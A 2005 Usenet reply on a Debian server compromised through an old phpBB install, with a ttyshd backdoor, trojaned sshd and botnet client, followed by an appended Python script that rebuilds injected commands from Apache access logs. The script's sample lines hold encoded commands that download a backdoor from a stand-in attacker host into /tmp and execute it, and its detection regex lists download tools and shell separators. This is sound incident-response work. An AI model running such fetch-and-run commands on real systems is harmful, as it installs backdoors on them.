Re: backdoor named tvic / Kayten / ttyshd download in apache logfile

From: Chris Kronberg (smil_at_agleia.de)
Date: 04/26/05


Date: 26 Apr 2005 15:40:25 GMT

Henning wrote in article <7d202f03.0504260051.594bf9e3@posting.google.com>:
>> If this is the case your system might be in real trouble.
> Yes it is/was. The ttyshd opened a telnet account for them.
> They managed to gain root access! But I wonder how. It is a Debian

  That's bitter.

> testing with apt-get upgrade only 2 days before the attack. And their
> telnet shell ran as user www-data.
> They replaced the ssh daemon and the log/network daemons. With the ssh
> daemon they could read the root pw from me. They installed an

  *ouch*. A good reason to move away from passwords and use RSA
  authentication.

> IRC-BotNet Client to control the server and another qmail for
> spamming.
> They didn't touch my IP Accounting so I know that 2-3 GB of traffic
> was produced.
> They did no more damage because they wanted to have this PC in their
> botnet?

  Presumably. A damaged system wouldn't be funny. Usually a cracker
  wants to stay after an intrusion was successful.

> Luckily I made a backup 2 days before the attack. I reinstalled the
> system.

  Well done.

> (I couldn't trust any file on the server anymore)
>
>> Do you have any cgi script running on your webserver?
> Yes some CGI and PHP. I think they used a 'code injection' on an old
> phpBB install of a customer.
 
  Well, phpBB has an awfully long list of problems. Some of them
  allow remote command execution if I remember correctly.

> I secured the system now. PHP in safe-mode without
> "exec/system/passthru" calls.
> Programs like wget/ftp/chmod ... are only accessible from members of
> "users".

  Are you sure that your www-data user is/was not part of that group?
  Curious as I am I looked around a little bit and found indeed error
  log entries like those you have posted. The ones I found were of a
  successful remote command execution of vulnerable scripts using wget
  to download stuff.
  Btw. what does your access log say? If those were GET requests the
  commands given can be reconstructed.

  Cheers,

  Chris.
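Chris's last point, that commands injected through GET requests can be reconstructed from the access log, is worth showing concretely. The following Python script is an added example and is not part of the post or of any tool mentioned in it: it parses Apache combined-format lines, URL-decodes the request target (repeatedly, since injected payloads are often double-encoded), and reports the GET requests whose decoded target contains download tools, shell separators or the dropper name from the thread. The log lines are constructed for the example; `view.cgi`, the `file` parameter and the host `attacker.example` are made-up placeholders, not a real vulnerable script.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not from the post).
# Lines 2 and 3 carry a single- and a double-encoded injected command;
# line 4 is a POST, whose body is not in the access log and cannot be recovered here.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [26/Apr/2005:15:40:25 +0000] "GET /index.php?page=about HTTP/1.1" 200 2317 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Apr/2005:15:41:02 +0000] "GET /cgi-bin/view.cgi?file=news.txt%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2Fattacker.example%2Fttyshd HTTP/1.0" 200 512 "-" "Wget/1.9"
10.0.0.9 - - [26/Apr/2005:15:41:07 +0000] "GET /cgi-bin/view.cgi?file=x%253Bchmod%2520%252Bx%2520%252Ftmp%252Fttyshd%253B%252Ftmp%252Fttyshd HTTP/1.0" 200 512 "-" "Wget/1.9"
10.0.0.7 - - [26/Apr/2005:15:42:11 +0000] "POST /forum/login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
"""

# Apache "combined" format: ip ident user [timestamp] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Things that do not belong in a legitimate URL: download tools, chmod,
# /tmp paths, shell separators, and the backdoor names from the thread.
INDICATORS = re.compile(
    r'(?:\bwget\b|\bcurl\b|\bchmod\b|/tmp/|\bttyshd\b|\btvic\b|[;|`]|\$\()'
)


def decode_target(target, max_rounds=3):
    """URL-decode the request target until it stops changing (bounded),
    so %2541 -> %41 -> A. unquote() rather than unquote_plus() is used so a
    literal '+' in a command (e.g. 'chmod +x') is not turned into a space."""
    decoded = target
    for _ in range(max_rounds):
        new = unquote(decoded)
        if new == decoded:
            break
        decoded = new
    return decoded


def reconstruct_commands(log_text):
    """Return one record per GET request whose decoded target matches an indicator.
    Only GET requests are examined: a POST body never reaches the access log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group('method') != 'GET':
            continue
        decoded = decode_target(m.group('target'))
        if INDICATORS.search(decoded):
            hits.append({
                'ip': m.group('ip'),
                'time': m.group('ts'),
                'status': int(m.group('status')),   # 200 suggests the script ran
                'decoded': decoded,
            })
    return hits


if __name__ == '__main__':
    for hit in reconstruct_commands(SAMPLE_ACCESS_LOG):
        print(f"{hit['time']} {hit['ip']} [{hit['status']}] {hit['decoded']}")
```

Run against a real log the output pairs each injected command with the client address, timestamp and response status, which is the material needed to correlate with the error-log entries Chris describes and to check whether the download actually succeeded (a 200 from the vulnerable script, followed by the dropped file appearing in `/tmp`).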